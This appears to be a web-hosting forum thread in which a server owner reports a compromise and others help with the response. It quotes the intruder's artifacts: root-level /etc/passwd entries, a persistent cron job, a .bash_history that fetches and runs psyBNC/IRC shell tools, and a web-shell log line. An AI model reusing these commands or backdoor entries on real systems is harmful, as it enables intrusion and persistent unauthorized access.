[hackcheck] mysqli has a uid 0 account
[hackcheck] services has a uid 0 account
History command report this activity
[hackcheck] services has a uid 0 account
History command report this activity
what to do?
Infopro
Well-Known Member
If you're unsure of your next steps, you can save yourself a lot of time by hiring someone who might be able to help.
cPanel has a list of people who probably can help, located here:
Sys Admin Services « Application Catalog
cPanel has a list of people who probably can help, located here:
Sys Admin Services « Application Catalog
Is this a VPS or server you're running? If it's a webserver, could be a script or configuration error. But if it's a VPS, I'd assume you may have been breached :-/ Do you have root access over the server?
It's a dedicated Server. After I remove the two string from passwd,
As yesterday, at 2.59am the two strings
services:x:0:0::/home/services:/bin/bash
mysqli:x:0:0::/home/mysqli:/bin/bash
added again in the etc/passwd file.
and I find also:
sgl:x:32008:32010::/home/sgl:/bin/bash
Some strange files in home/sgl like:
psybiru.tar.gz
As yesterday, at 2.59am the two strings
services:x:0:0::/home/services:/bin/bash
mysqli:x:0:0::/home/mysqli:/bin/bash
added again in the etc/passwd file.
and I find also:
sgl:x:32008:32010::/home/sgl:/bin/bash
Some strange files in home/sgl like:
psybiru.tar.gz
Ouch. You have been breached. Getting any random calls from this domain?
-removed- EDIT - Lol, that showed up with the URL - didn't know it would automatically throw that. it translates to http[colon]3xploit.110mb.com
psybiru.tar.gz is an IP shell, lets you use IRC through it, aka a BNC server. Disaster recover time...
These are all just my suggestions, I'm kinda new here, and I don't want to overstep, but this is what I do
1. Backup your web-data locally immediately
2. Change all of your passwords - ftp, web, mail etc.. In fact, kill FTP altogether if you can to be safe.
3. Make sure any non-cpanel scripts are updated, if you can, term them too.
4. Go to your rap ip logs, turn on archiving. Maybe you can figure out where the POE was if you check the detailed records. Guaranteed you have a secondary user setup somewhere with vulnerable permissions.
5. BLOCK anything from 110mb.com. It is 1 100% temporary solution, but it will stop the automatic reinstall of the shell in question for a little bit of time for you to examine the logs.
Are you running webdav? Again, if you can turn it off, do so. The webdav exploit isn't new, but it's been popping up again on the underground forums.. wierd how old stuff can come back to bite ya, huh? Oh ya, block anything related to IRC and BNC if you have no dependencies. This will all just buy you time, but that's exactly the thing your pesky intruders are looking for too.
If you can figure out if you have any IRC/BNC connections and what the source IP's are, I would be happy to do a little research on those myself. Nothin' like a little honeypot action to start my morning off..
-removed- EDIT - Lol, that showed up with the URL - didn't know it would automatically throw that. it translates to http[colon]3xploit.110mb.com
psybiru.tar.gz is an IP shell, lets you use IRC through it, aka a BNC server. Disaster recover time...
These are all just my suggestions, I'm kinda new here, and I don't want to overstep, but this is what I do
1. Backup your web-data locally immediately
2. Change all of your passwords - ftp, web, mail etc.. In fact, kill FTP altogether if you can to be safe.
3. Make sure any non-cpanel scripts are updated, if you can, term them too.
4. Go to your rap ip logs, turn on archiving. Maybe you can figure out where the POE was if you check the detailed records. Guaranteed you have a secondary user setup somewhere with vulnerable permissions.
5. BLOCK anything from 110mb.com. It is 1 100% temporary solution, but it will stop the automatic reinstall of the shell in question for a little bit of time for you to examine the logs.
Are you running webdav? Again, if you can turn it off, do so. The webdav exploit isn't new, but it's been popping up again on the underground forums.. wierd how old stuff can come back to bite ya, huh? Oh ya, block anything related to IRC and BNC if you have no dependencies. This will all just buy you time, but that's exactly the thing your pesky intruders are looking for too.
If you can figure out if you have any IRC/BNC connections and what the source IP's are, I would be happy to do a little research on those myself. Nothin' like a little honeypot action to start my morning off..
Last edited by a moderator:
Reported to 110mb.com. They take care of this stuff pretty quick, but take care of your situation ASAP! Feel free to let me know if you need help, I'll be around for a couple more hours if you need anything (applies to anyone else having an issue with this)- Just checked, this domain has been around for a bit.. wierd.
Thank you for your help. I want to make first a full backup and after that we can play with this.
Glad to see your head is in the right place - Remember, your backups will likely be infected to some degree as well. don't just pop them right back up without some proper analysis..
You can either block the FQDN (fully qualified domain name) or a single IP, or a range. In this case, I would block a range (10.12.12.1-10.12.13.1), since 110mb is a shared host, and a popular one at that. Use the IP Deny Manager in cPanel.
A little update,
I found also:
* * * * * /home/sgl/components/y2kupdate ]/dev/null 2]&1
in sgl user (not configured by cpanel and me).
I found also:
* * * * * /home/sgl/components/y2kupdate ]/dev/null 2]&1
in sgl user (not configured by cpanel and me).
.bash_history on the fake user:
Code:
id
sudo -i
hostname
w
logout
cat /etc/ssh/sshd_config
sudo -i
id
w
wget -removed url-
tar -zxvf psyBNC-2.3.2-7.tar.gz
cd psybnc
make menuconfig
sudo -i
make menuconfig
whereis ld
make menuconfig
make
ls -al
pwd
pico psybncchk
./psybnc
kill -9 24536
ps -c
ls -al
cat psybnc.conf
pico psybnc.conf
./psybnc
ps -c
./psybnc
ps -c
cd
ls -al
wget -removed url- -zxvf psybiru.tar.gz
cd components/
./config 1234;./****************;./run
cd scripts
rm -rf DEFAULT.SCRIPT
wget -removed url-
cd
logout
sudo
sudo -i
ls -al
ps -c
ps -x
killall -9 psybnc
cd psybnc
./psybnc
cat psybnc.conf
ps -c
pwd
killall -9 psybnc
pico psybnc.conf
./psybnc
pico psybnc.conf
killall -9 psybnc
pico psybnc.conf
./psybnc
sudo -i
cd
killall -9 psybnc
ls -al
cd components
ls -al
pico psybnc.conf
pico ssstt
rm -rf ssstt
ps -x
killall -9 psybnc
killall -9 psybnc
Last edited by a moderator:
This is the hole?
Code:
/var/log/exim_mainlog:118423:2012-04-17 13:29:12 1SK6au-0006Vw-Tw <= [email protected] U=user P=local S=549 T="Fx29Shell http://domainaccount.com/wp-commentsrss.php?act=img&img=buffer by 180.252.**.***" for [email protected]
Last edited by a moderator:
Do you mean it is wordpress, because exim cannot execute commands that would cause this type of issue.
| Thread starter | Similar threads | Forum | Replies | Date |
|---|---|---|---|---|
| B | [cPanel hackcheck] has a uid 0 account | Security | 12 | |
| L | Hackcheck | Security | 4 | |
| E | [hackcheck] http has a uid 0 account | Security | 9 | |
| A | [hackcheck] Possible root compromise detected | Security | 9 | |
| B | [hackcheck] dbmysql has a uid 0 account | Security | 3 |